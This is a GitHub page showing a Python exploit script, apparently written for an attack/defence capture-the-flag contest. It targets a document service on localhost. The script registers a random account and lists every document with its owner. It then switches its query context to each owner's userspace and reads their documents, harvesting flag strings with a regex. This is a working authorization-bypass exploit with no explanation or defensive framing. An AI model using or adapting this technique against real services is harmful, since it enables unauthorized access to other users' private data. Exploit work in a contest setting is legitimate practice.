-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathscp.1.sploit.py
executable file
·67 lines (52 loc) · 1.46 KB
/
scp.1.sploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/env python3.11
import string
import requests
import re
import random
URL = "http://localhost:8081/"
def get_token():
resp = requests.post(URL + "welcome", json={
"login": ''.join(random.choice(string.ascii_letters) for _ in range(10)),
"password": ''.join(random.choice(string.ascii_letters) for _ in range(10))
})
return resp.text
def get_doc_with_user(token):
ql = '''
@doc <- {(0, 50) -> list};
{(@doc) -> result};
'''
data = {
"token": token,
"query": ql
}
resp = requests.post(URL, json=data)
a = resp.text
body = resp.json()
doc_with_user = []
for pair in body["body"].strip().split("\n"):
doc, user = pair.split(":")[0].strip(), pair.split(":")[1].strip()
doc_with_user.append((doc, user))
return doc_with_user
def get_flags(token):
doc_with_user = get_doc_with_user(token)
flags = []
for d, u in doc_with_user:
userspace = f'@userspace <- "{u}";'
doc = '@doc <- {('+d+') -> get};'
res = '{(@doc) -> result};'
ql = userspace + doc + res
data = {
"token": token,
"query": ql
}
resp = requests.post(URL, json=data)
body = resp.json()
finds = re.findall(r'\w{31}=', body["body"])
if finds:
flags += finds
return flags
def main():
token = get_token()
print(get_flags(token))
if __name__ == "__main__":
main()